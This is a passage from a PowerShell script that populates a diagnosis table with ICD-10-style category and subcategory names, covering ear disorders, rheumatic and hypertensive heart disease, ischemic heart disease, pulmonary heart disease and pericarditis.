ear") + $null = $DiagnosisList.Rows.Add("Diplacusis","Diplacusis, right ear") + $null = $DiagnosisList.Rows.Add("Diplacusis","Diplacusis, left ear") + $null = $DiagnosisList.Rows.Add("Diplacusis","Diplacusis, bilateral") + $null = $DiagnosisList.Rows.Add("Diplacusis","Diplacusis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Hyperacusis","Hyperacusis, right ear") + $null = $DiagnosisList.Rows.Add("Hyperacusis","Hyperacusis, left ear") + $null = $DiagnosisList.Rows.Add("Hyperacusis","Hyperacusis, bilateral") + $null = $DiagnosisList.Rows.Add("Hyperacusis","Hyperacusis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Temporary auditory threshold shift","Temporary auditory threshold shift, right ear") + $null = $DiagnosisList.Rows.Add("Temporary auditory threshold shift","Temporary auditory threshold shift, left ear") + $null = $DiagnosisList.Rows.Add("Temporary auditory threshold shift","Temporary auditory threshold shift, bilateral") + $null = $DiagnosisList.Rows.Add("Temporary auditory threshold shift","Temporary auditory threshold shift, unspecified ear") + $null = $DiagnosisList.Rows.Add("Central auditory processing disorder","Central auditory processing disorder") + $null = $DiagnosisList.Rows.Add("Other abnormal auditory perceptions","Other abnormal auditory perceptions, right ear") + $null = $DiagnosisList.Rows.Add("Other abnormal auditory perceptions","Other abnormal auditory perceptions, left ear") + $null = $DiagnosisList.Rows.Add("Other abnormal auditory perceptions","Other abnormal auditory perceptions, bilateral") + $null = $DiagnosisList.Rows.Add("Other abnormal auditory perceptions","Other abnormal auditory perceptions, unspecified ear") + $null = $DiagnosisList.Rows.Add("Disorders of acoustic nerve","Disorders of right acoustic nerve") + $null = $DiagnosisList.Rows.Add("Disorders of acoustic nerve","Disorders of left acoustic nerve") + $null = $DiagnosisList.Rows.Add("Disorders of acoustic nerve","Disorders of bilateral acoustic nerves") + $null = $DiagnosisList.Rows.Add("Disorders of acoustic nerve","Disorders of unspecified acoustic nerve") + $null = $DiagnosisList.Rows.Add("Other specified disorders of ear","Other specified disorders of right ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of ear","Other specified disorders of left ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of ear","Other specified disorders of ear, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of ear","Other specified disorders of ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of ear","Unspecified disorder of ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of ear","Unspecified disorder of right ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of ear","Unspecified disorder of left ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of ear","Unspecified disorder of ear, bilateral") + $null = $DiagnosisList.Rows.Add("Acoustic neuritis in infectious and parasitic diseases classified elsewhere","Acoustic neuritis in infectious and parasitic diseases classified elsewhere, unspecified ear") + $null = $DiagnosisList.Rows.Add("Acoustic neuritis in infectious and parasitic diseases classified elsewhere","Acoustic neuritis in infectious and parasitic diseases classified elsewhere, right ear") + $null = $DiagnosisList.Rows.Add("Acoustic neuritis in infectious and parasitic diseases classified elsewhere","Acoustic neuritis in infectious and parasitic diseases classified elsewhere, left ear") + $null = $DiagnosisList.Rows.Add("Acoustic neuritis in infectious and parasitic diseases classified elsewhere","Acoustic neuritis in infectious and parasitic diseases classified elsewhere, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of ear in diseases classified elsewhere","Other specified disorders of ear in diseases classified elsewhere, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of ear in diseases classified elsewhere","Other specified disorders of right ear in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified disorders of ear in diseases classified elsewhere","Other specified disorders of left ear in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified disorders of ear in diseases classified elsewhere","Other specified disorders of ear in diseases classified elsewhere, bilateral") + $null = $DiagnosisList.Rows.Add("Recurrent cholesteatoma of postmastoidectomy cavity","Recurrent cholesteatoma of postmastoidectomy cavity, unspecified ear") + $null = $DiagnosisList.Rows.Add("Recurrent cholesteatoma of postmastoidectomy cavity","Recurrent cholesteatoma of postmastoidectomy cavity, right ear") + $null = $DiagnosisList.Rows.Add("Recurrent cholesteatoma of postmastoidectomy cavity","Recurrent cholesteatoma of postmastoidectomy cavity, left ear") + $null = $DiagnosisList.Rows.Add("Recurrent cholesteatoma of postmastoidectomy cavity","Recurrent cholesteatoma of postmastoidectomy cavity, bilateral ears") + $null = $DiagnosisList.Rows.Add("Chronic inflammation of postmastoidectomy cavity","Chronic inflammation of postmastoidectomy cavity, right ear") + $null = $DiagnosisList.Rows.Add("Chronic inflammation of postmastoidectomy cavity","Chronic inflammation of postmastoidectomy cavity, left ear") + $null = $DiagnosisList.Rows.Add("Chronic inflammation of postmastoidectomy cavity","Chronic inflammation of postmastoidectomy cavity, bilateral ears") + $null = $DiagnosisList.Rows.Add("Chronic inflammation of postmastoidectomy cavity","Chronic inflammation of postmastoidectomy cavity, unspecified ear") + $null = $DiagnosisList.Rows.Add("Granulation of postmastoidectomy cavity","Granulation of postmastoidectomy cavity, right ear") + $null = $DiagnosisList.Rows.Add("Granulation of postmastoidectomy cavity","Granulation of postmastoidectomy cavity, left ear") + $null = $DiagnosisList.Rows.Add("Granulation of postmastoidectomy cavity","Granulation of postmastoidectomy cavity, bilateral ears") + $null = $DiagnosisList.Rows.Add("Granulation of postmastoidectomy cavity","Granulation of postmastoidectomy cavity, unspecified ear") + $null = $DiagnosisList.Rows.Add("Mucosal cyst of postmastoidectomy cavity","Mucosal cyst of postmastoidectomy cavity, right ear") + $null = $DiagnosisList.Rows.Add("Mucosal cyst of postmastoidectomy cavity","Mucosal cyst of postmastoidectomy cavity, left ear") + $null = $DiagnosisList.Rows.Add("Mucosal cyst of postmastoidectomy cavity","Mucosal cyst of postmastoidectomy cavity, bilateral ears") + $null = $DiagnosisList.Rows.Add("Mucosal cyst of postmastoidectomy cavity","Mucosal cyst of postmastoidectomy cavity, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other disorders following mastoidectomy","Other disorders following mastoidectomy, right ear") + $null = $DiagnosisList.Rows.Add("Other disorders following mastoidectomy","Other disorders following mastoidectomy, left ear") + $null = $DiagnosisList.Rows.Add("Other disorders following mastoidectomy","Other disorders following mastoidectomy, bilateral ears") + $null = $DiagnosisList.Rows.Add("Other disorders following mastoidectomy","Other disorders following mastoidectomy, unspecified ear") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of ear and mastoid process complicating a procedure","Intraoperative hemorrhage and hematoma of ear and mastoid process complicating a procedure on the ear and mastoid process") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of ear and mastoid process complicating a procedure","Intraoperative hemorrhage and hematoma of ear and mastoid process complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of ear and mastoid process during a procedure","Accidental puncture and laceration of the ear and mastoid process during a procedure on the ear and mastoid process") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of ear and mastoid process during a procedure","Accidental puncture and laceration of the ear and mastoid process during other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of ear and mastoid process following a procedure","Postprocedural hemorrhage of ear and mastoid process following a procedure on the ear and mastoid process") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of ear and mastoid process following a procedure","Postprocedural hemorrhage of ear and mastoid process following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of ear and mastoid process following a procedure","Postprocedural hematoma of ear and mastoid process following a procedure on the ear and mastoid process") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of ear and mastoid process following a procedure","Postprocedural hematoma of ear and mastoid process following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of ear and mastoid process following a procedure","Postprocedural seroma of ear and mastoid process following a procedure on the ear and mastoid process") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of ear and mastoid process following a procedure","Postprocedural seroma of ear and mastoid process following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural stenosis of external ear canal","Postprocedural stenosis of right external ear canal") + $null = $DiagnosisList.Rows.Add("Postprocedural stenosis of external ear canal","Postprocedural stenosis of left external ear canal") + $null = $DiagnosisList.Rows.Add("Postprocedural stenosis of external ear canal","Postprocedural stenosis of external ear canal, bilateral") + $null = $DiagnosisList.Rows.Add("Postprocedural stenosis of external ear canal","Postprocedural stenosis of unspecified external ear canal") + $null = $DiagnosisList.Rows.Add("Other intraoperative complications and disorders of the ear and mastoid process, not elsewhere classified","Other intraoperative complications and disorders of the ear and mastoid process, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other postprocedural complications and disorders of the ear and mastoid process, not elsewhere classified","Other postprocedural complications and disorders of the ear and mastoid process, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Rheumatic fever without heart involvement","Rheumatic fever without heart involvement") + $null = $DiagnosisList.Rows.Add("Rheumatic fever with heart involvement","Acute rheumatic pericarditis") + $null = $DiagnosisList.Rows.Add("Rheumatic fever with heart involvement","Acute rheumatic endocarditis") + $null = $DiagnosisList.Rows.Add("Rheumatic fever with heart involvement","Acute rheumatic myocarditis") + $null = $DiagnosisList.Rows.Add("Rheumatic fever with heart involvement","Other acute rheumatic heart disease") + $null = $DiagnosisList.Rows.Add("Rheumatic fever with heart involvement","Acute rheumatic heart disease, unspecified") + $null = $DiagnosisList.Rows.Add("Rheumatic chorea","Rheumatic chorea with heart involvement") + $null = $DiagnosisList.Rows.Add("Rheumatic chorea","Rheumatic chorea without heart involvement") + $null = $DiagnosisList.Rows.Add("Rheumatic mitral valve diseases","Rheumatic mitral stenosis") + $null = $DiagnosisList.Rows.Add("Rheumatic mitral valve diseases","Rheumatic mitral insufficiency") + $null = $DiagnosisList.Rows.Add("Rheumatic mitral valve diseases","Rheumatic mitral stenosis with insufficiency") + $null = $DiagnosisList.Rows.Add("Rheumatic mitral valve diseases","Other rheumatic mitral valve diseases") + $null = $DiagnosisList.Rows.Add("Rheumatic mitral valve diseases","Rheumatic mitral valve disease, unspecified") + $null = $DiagnosisList.Rows.Add("Rheumatic aortic valve diseases","Rheumatic aortic stenosis") + $null = $DiagnosisList.Rows.Add("Rheumatic aortic valve diseases","Rheumatic aortic insufficiency") + $null = $DiagnosisList.Rows.Add("Rheumatic aortic valve diseases","Rheumatic aortic stenosis with insufficiency") + $null = $DiagnosisList.Rows.Add("Rheumatic aortic valve diseases","Other rheumatic aortic valve diseases") + $null = $DiagnosisList.Rows.Add("Rheumatic aortic valve diseases","Rheumatic aortic valve disease, unspecified") + $null = $DiagnosisList.Rows.Add("Rheumatic tricuspid valve diseases","Rheumatic tricuspid stenosis") + $null = $DiagnosisList.Rows.Add("Rheumatic tricuspid valve diseases","Rheumatic tricuspid insufficiency") + $null = $DiagnosisList.Rows.Add("Rheumatic tricuspid valve diseases","Rheumatic tricuspid stenosis and insufficiency") + $null = $DiagnosisList.Rows.Add("Rheumatic tricuspid valve diseases","Other rheumatic tricuspid valve diseases") + $null = $DiagnosisList.Rows.Add("Rheumatic tricuspid valve diseases","Rheumatic tricuspid valve disease, unspecified") + $null = $DiagnosisList.Rows.Add("Multiple valve diseases","Rheumatic disorders of both mitral and aortic valves") + $null = $DiagnosisList.Rows.Add("Multiple valve diseases","Rheumatic disorders of both mitral and tricuspid valves") + $null = $DiagnosisList.Rows.Add("Multiple valve diseases","Rheumatic disorders of both aortic and tricuspid valves") + $null = $DiagnosisList.Rows.Add("Multiple valve diseases","Combined rheumatic disorders of mitral, aortic and tricuspid valves") + $null = $DiagnosisList.Rows.Add("Multiple valve diseases","Other rheumatic multiple valve diseases") + $null = $DiagnosisList.Rows.Add("Multiple valve diseases","Rheumatic multiple valve disease, unspecified") + $null = $DiagnosisList.Rows.Add("Other rheumatic heart diseases","Rheumatic myocarditis") + $null = $DiagnosisList.Rows.Add("Other rheumatic heart diseases","Rheumatic diseases of endocardium, valve unspecified") + $null = $DiagnosisList.Rows.Add("Other rheumatic heart diseases","Chronic rheumatic pericarditis") + $null = $DiagnosisList.Rows.Add("Other specified rheumatic heart diseases","Rheumatic heart failure") + $null = $DiagnosisList.Rows.Add("Other specified rheumatic heart diseases","Other specified rheumatic heart diseases") + $null = $DiagnosisList.Rows.Add("Rheumatic heart disease, unspecified","Rheumatic heart disease, unspecified") + $null = $DiagnosisList.Rows.Add("Essential (primary) hypertension","Essential (primary) hypertension") + $null = $DiagnosisList.Rows.Add("Hypertensive heart disease","Hypertensive heart disease with heart failure") + $null = $DiagnosisList.Rows.Add("Hypertensive heart disease","Hypertensive heart disease without heart failure") + $null = $DiagnosisList.Rows.Add("Hypertensive chronic kidney disease","Hypertensive chronic kidney disease with stage 5 chronic kidney disease or end stage renal disease") + $null = $DiagnosisList.Rows.Add("Hypertensive chronic kidney disease","Hypertensive chronic kidney disease with stage 1 through stage 4 chronic kidney disease, or unspecified chronic kidney disease") + $null = $DiagnosisList.Rows.Add("Hypertensive heart and chronic kidney disease","Hypertensive heart and chronic kidney disease with heart failure and stage 1 through stage 4 chronic kidney disease, or unspecified chronic kidney disease") + $null = $DiagnosisList.Rows.Add("Hypertensive heart and chronic kidney disease without heart failure","Hypertensive heart and chronic kidney disease without heart failure, with stage 1 through stage 4 chronic kidney disease, or unspecified chronic kidney disease") + $null = $DiagnosisList.Rows.Add("Hypertensive heart and chronic kidney disease without heart failure","Hypertensive heart and chronic kidney disease without heart failure, with stage 5 chronic kidney disease, or end stage renal disease") + $null = $DiagnosisList.Rows.Add("Hypertensive heart and chronic kidney disease with heart failure and with stage 5 chronic kidney disease, or end stage renal disease","Hypertensive heart and chronic kidney disease with heart failure and with stage 5 chronic kidney disease, or end stage renal disease") + $null = $DiagnosisList.Rows.Add("Secondary hypertension","Renovascular hypertension") + $null = $DiagnosisList.Rows.Add("Secondary hypertension","Hypertension secondary to other renal disorders") + $null = $DiagnosisList.Rows.Add("Secondary hypertension","Hypertension secondary to endocrine disorders") + $null = $DiagnosisList.Rows.Add("Secondary hypertension","Other secondary hypertension") + $null = $DiagnosisList.Rows.Add("Secondary hypertension","Secondary hypertension, unspecified") + $null = $DiagnosisList.Rows.Add("Hypertensive crisis","Hypertensive urgency") + $null = $DiagnosisList.Rows.Add("Hypertensive crisis","Hypertensive emergency") + $null = $DiagnosisList.Rows.Add("Hypertensive crisis","Hypertensive crisis, unspecified") + $null = $DiagnosisList.Rows.Add("Angina pectoris","Unstable angina") + $null = $DiagnosisList.Rows.Add("Angina pectoris","Angina pectoris with documented spasm") + $null = $DiagnosisList.Rows.Add("Angina pectoris","Other forms of angina pectoris") + $null = $DiagnosisList.Rows.Add("Angina pectoris","Angina pectoris, unspecified") + $null = $DiagnosisList.Rows.Add("ST elevation (STEMI) myocardial infarction of anterior wall","ST elevation (STEMI) myocardial infarction involving left main coronary artery") + $null = $DiagnosisList.Rows.Add("ST elevation (STEMI) myocardial infarction of anterior wall","ST elevation (STEMI) myocardial infarction involving left anterior descending coronary artery") + $null = $DiagnosisList.Rows.Add("ST elevation (STEMI) myocardial infarction of anterior wall","ST elevation (STEMI) myocardial infarction involving other coronary artery of anterior wall") + $null = $DiagnosisList.Rows.Add("ST elevation (STEMI) myocardial infarction of inferior wall","ST elevation (STEMI) myocardial infarction involving right coronary artery") + $null = $DiagnosisList.Rows.Add("ST elevation (STEMI) myocardial infarction of inferior wall","ST elevation (STEMI) myocardial infarction involving other coronary artery of inferior wall") + $null = $DiagnosisList.Rows.Add("ST elevation (STEMI) myocardial infarction of other sites","ST elevation (STEMI) myocardial infarction involving left circumflex coronary artery") + $null = $DiagnosisList.Rows.Add("ST elevation (STEMI) myocardial infarction of other sites","ST elevation (STEMI) myocardial infarction involving other sites") + $null = $DiagnosisList.Rows.Add("ST elevation (STEMI) myocardial infarction of unspecified site","ST elevation (STEMI) myocardial infarction of unspecified site") + $null = $DiagnosisList.Rows.Add("Non-ST elevation (NSTEMI) myocardial infarction","Non-ST elevation (NSTEMI) myocardial infarction") + $null = $DiagnosisList.Rows.Add("Acute myocardial infarction, unspecified","Acute myocardial infarction, unspecified") + $null = $DiagnosisList.Rows.Add("Other type of myocardial infarction","Myocardial infarction type 2") + $null = $DiagnosisList.Rows.Add("Other type of myocardial infarction","Other myocardial infarction type") + $null = $DiagnosisList.Rows.Add("Subsequent ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction","Subsequent ST elevation (STEMI) myocardial infarction of anterior wall") + $null = $DiagnosisList.Rows.Add("Subsequent ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction","Subsequent ST elevation (STEMI) myocardial infarction of inferior wall") + $null = $DiagnosisList.Rows.Add("Subsequent ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction","Subsequent non-ST elevation (NSTEMI) myocardial infarction") + $null = $DiagnosisList.Rows.Add("Subsequent ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction","Subsequent ST elevation (STEMI) myocardial infarction of other sites") + $null = $DiagnosisList.Rows.Add("Subsequent ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction","Subsequent ST elevation (STEMI) myocardial infarction of unspecified site") + $null = $DiagnosisList.Rows.Add("Certain current complications following ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction (within the 28 day period)","Hemopericardium as current complication following acute myocardial infarction") + $null = $DiagnosisList.Rows.Add("Certain current complications following ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction (within the 28 day period)","Atrial septal defect as current complication following acute myocardial infarction") + $null = $DiagnosisList.Rows.Add("Certain current complications following ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction (within the 28 day period)","Ventricular septal defect as current complication following acute myocardial infarction") + $null = $DiagnosisList.Rows.Add("Certain current complications following ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction (within the 28 day period)","Rupture of cardiac wall without hemopericardium as current complication following acute myocardial infarction") + $null = $DiagnosisList.Rows.Add("Certain current complications following ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction (within the 28 day period)","Rupture of chordae tendineae as current complication following acute myocardial infarction") + $null = $DiagnosisList.Rows.Add("Certain current complications following ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction (within the 28 day period)","Rupture of papillary muscle as current complication following acute myocardial infarction") + $null = $DiagnosisList.Rows.Add("Certain current complications following ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction (within the 28 day period)","Thrombosis of atrium, auricular appendage, and ventricle as current complications following acute myocardial infarction") + $null = $DiagnosisList.Rows.Add("Certain current complications following ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction (within the 28 day period)","Postinfarction angina") + $null = $DiagnosisList.Rows.Add("Certain current complications following ST elevation (STEMI) and non-ST elevation (NSTEMI) myocardial infarction (within the 28 day period)","Other current complications following acute myocardial infarction") + $null = $DiagnosisList.Rows.Add("Other acute ischemic heart diseases","Acute coronary thrombosis not resulting in myocardial infarction") + $null = $DiagnosisList.Rows.Add("Other acute ischemic heart diseases","Dressler's syndrome") + $null = $DiagnosisList.Rows.Add("Other acute ischemic heart diseases","Other forms of acute ischemic heart disease") + $null = $DiagnosisList.Rows.Add("Other acute ischemic heart diseases","Acute ischemic heart disease, unspecified") + $null = $DiagnosisList.Rows.Add("Atherosclerotic heart disease of native coronary artery","Atherosclerotic heart disease of native coronary artery without angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerotic heart disease of native coronary artery with angina pectoris","Atherosclerotic heart disease of native coronary artery with unstable angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerotic heart disease of native coronary artery with angina pectoris","Atherosclerotic heart disease of native coronary artery with angina pectoris with documented spasm") + $null = $DiagnosisList.Rows.Add("Atherosclerotic heart disease of native coronary artery with angina pectoris","Atherosclerotic heart disease of native coronary artery with other forms of angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerotic heart disease of native coronary artery with angina pectoris","Atherosclerotic heart disease of native coronary artery with unspecified angina pectoris") + $null = $DiagnosisList.Rows.Add("Old myocardial infarction","Old myocardial infarction") + $null = $DiagnosisList.Rows.Add("Aneurysm of heart","Aneurysm of heart") + $null = $DiagnosisList.Rows.Add("Coronary artery aneurysm and dissection","Coronary artery aneurysm") + $null = $DiagnosisList.Rows.Add("Coronary artery aneurysm and dissection","Coronary artery dissection") + $null = $DiagnosisList.Rows.Add("Ischemic cardiomyopathy","Ischemic cardiomyopathy") + $null = $DiagnosisList.Rows.Add("Silent myocardial ischemia","Silent myocardial ischemia") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of coronary artery bypass graft(s), unspecified, with angina pectoris","Atherosclerosis of coronary artery bypass graft(s), unspecified, with unstable angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of coronary artery bypass graft(s), unspecified, with angina pectoris","Atherosclerosis of coronary artery bypass graft(s), unspecified, with angina pectoris with documented spasm") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of coronary artery bypass graft(s), unspecified, with angina pectoris","Atherosclerosis of coronary artery bypass graft(s), unspecified, with other forms of angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of coronary artery bypass graft(s), unspecified, with angina pectoris","Atherosclerosis of coronary artery bypass graft(s), unspecified, with unspecified angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of autologous vein coronary artery bypass graft(s) with unstable angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of autologous vein coronary artery bypass graft(s) with angina pectoris with documented spasm") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of autologous vein coronary artery bypass graft(s) with other forms of angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous vein coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of autologous vein coronary artery bypass graft(s) with unspecified angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous artery coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of autologous artery coronary artery bypass graft(s) with unstable angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous artery coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of autologous artery coronary artery bypass graft(s) with angina pectoris with documented spasm") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous artery coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of autologous artery coronary artery bypass graft(s) with other forms of angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of autologous artery coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of autologous artery coronary artery bypass graft(s) with unspecified angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of nonautologous biological coronary artery bypass graft(s) with unstable angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of nonautologous biological coronary artery bypass graft(s) with angina pectoris with documented spasm") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of nonautologous biological coronary artery bypass graft(s) with other forms of angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of nonautologous biological coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of nonautologous biological coronary artery bypass graft(s) with unspecified angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native coronary artery of transplanted heart with angina pectoris","Atherosclerosis of native coronary artery of transplanted heart with unstable angina") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native coronary artery of transplanted heart with angina pectoris","Atherosclerosis of native coronary artery of transplanted heart with angina pectoris with documented spasm") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native coronary artery of transplanted heart with angina pectoris","Atherosclerosis of native coronary artery of transplanted heart with other forms of angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of native coronary artery of transplanted heart with angina pectoris","Atherosclerosis of native coronary artery of transplanted heart with unspecified angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of bypass graft of coronary artery of transplanted heart with angina pectoris","Atherosclerosis of bypass graft of coronary artery of transplanted heart with unstable angina") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of bypass graft of coronary artery of transplanted heart with angina pectoris","Atherosclerosis of bypass graft of coronary artery of transplanted heart with angina pectoris with documented spasm") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of bypass graft of coronary artery of transplanted heart with angina pectoris","Atherosclerosis of bypass graft of coronary artery of transplanted heart with other forms of angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of bypass graft of coronary artery of transplanted heart with angina pectoris","Atherosclerosis of bypass graft of coronary artery of transplanted heart with unspecified angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of other coronary artery bypass graft(s) with unstable angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of other coronary artery bypass graft(s) with angina pectoris with documented spasm") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of other coronary artery bypass graft(s) with other forms of angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other coronary artery bypass graft(s) with angina pectoris","Atherosclerosis of other coronary artery bypass graft(s) with unspecified angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other coronary vessels without angina pectoris","Atherosclerosis of coronary artery bypass graft(s) without angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other coronary vessels without angina pectoris","Atherosclerosis of native coronary artery of transplanted heart without angina pectoris") + $null = $DiagnosisList.Rows.Add("Atherosclerosis of other coronary vessels without angina pectoris","Atherosclerosis of bypass graft of coronary artery of transplanted heart without angina pectoris") + $null = $DiagnosisList.Rows.Add("Chronic total occlusion of coronary artery","Chronic total occlusion of coronary artery") + $null = $DiagnosisList.Rows.Add("Coronary atherosclerosis due to lipid rich plaque","Coronary atherosclerosis due to lipid rich plaque") + $null = $DiagnosisList.Rows.Add("Coronary atherosclerosis due to calcified coronary lesion","Coronary atherosclerosis due to calcified coronary lesion") + $null = $DiagnosisList.Rows.Add("Other forms of chronic ischemic heart disease","Other forms of chronic ischemic heart disease") + $null = $DiagnosisList.Rows.Add("Chronic ischemic heart disease, unspecified","Chronic ischemic heart disease, unspecified") + $null = $DiagnosisList.Rows.Add("Pulmonary embolism with acute cor pulmonale","Septic pulmonary embolism with acute cor pulmonale") + $null = $DiagnosisList.Rows.Add("Pulmonary embolism with acute cor pulmonale","Saddle embolus of pulmonary artery with acute cor pulmonale") + $null = $DiagnosisList.Rows.Add("Pulmonary embolism with acute cor pulmonale","Other pulmonary embolism with acute cor pulmonale") + $null = $DiagnosisList.Rows.Add("Pulmonary embolism without acute cor pulmonale","Septic pulmonary embolism without acute cor pulmonale") + $null = $DiagnosisList.Rows.Add("Pulmonary embolism without acute cor pulmonale","Saddle embolus of pulmonary artery without acute cor pulmonale") + $null = $DiagnosisList.Rows.Add("Pulmonary embolism without acute cor pulmonale","Other pulmonary embolism without acute cor pulmonale") + $null = $DiagnosisList.Rows.Add("Other pulmonary heart diseases","Primary pulmonary hypertension") + $null = $DiagnosisList.Rows.Add("Other pulmonary heart diseases","Kyphoscoliotic heart disease") + $null = $DiagnosisList.Rows.Add("Other secondary pulmonary hypertension","Pulmonary hypertension, unspecified") + $null = $DiagnosisList.Rows.Add("Other secondary pulmonary hypertension","Secondary pulmonary arterial hypertension") + $null = $DiagnosisList.Rows.Add("Other secondary pulmonary hypertension","Pulmonary hypertension due to left heart disease") + $null = $DiagnosisList.Rows.Add("Other secondary pulmonary hypertension","Pulmonary hypertension due to lung diseases and hypoxia") + $null = $DiagnosisList.Rows.Add("Other secondary pulmonary hypertension","Chronic thromboembolic pulmonary hypertension") + $null = $DiagnosisList.Rows.Add("Other secondary pulmonary hypertension","Other secondary pulmonary hypertension") + $null = $DiagnosisList.Rows.Add("Other specified pulmonary heart diseases","Cor pulmonale (chronic)") + $null = $DiagnosisList.Rows.Add("Other specified pulmonary heart diseases","Chronic pulmonary embolism") + $null = $DiagnosisList.Rows.Add("Other specified pulmonary heart diseases","Eisenmenger's syndrome") + $null = $DiagnosisList.Rows.Add("Other specified pulmonary heart diseases","Other specified pulmonary heart diseases") + $null = $DiagnosisList.Rows.Add("Pulmonary heart disease, unspecified","Pulmonary heart disease, unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases of pulmonary vessels","Arteriovenous fistula of pulmonary vessels") + $null = $DiagnosisList.Rows.Add("Other diseases of pulmonary vessels","Aneurysm of pulmonary artery") + $null = $DiagnosisList.Rows.Add("Other diseases of pulmonary vessels","Other diseases of pulmonary vessels") + $null = $DiagnosisList.Rows.Add("Other diseases of pulmonary vessels","Disease of pulmonary vessels, unspecified") + $null = $DiagnosisList.Rows.Add("Acute pericarditis","Acute nonspecific idiopathic pericarditis") + $null = $DiagnosisList.Rows.Add("Acute pericarditis","Infective pericarditis") + $null = $DiagnosisList.Rows.Add("Acute pericarditis","Other forms of acute pericarditis") + $null = $DiagnosisList.Rows.Add("Acute pericarditis","Acute pericarditis, unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases of pericardium","Chronic adhesive pericarditis") + $null = $DiagnosisList.Rows.Add("Other diseases of pericardium","Chronic constrictive pericarditis") + $null = 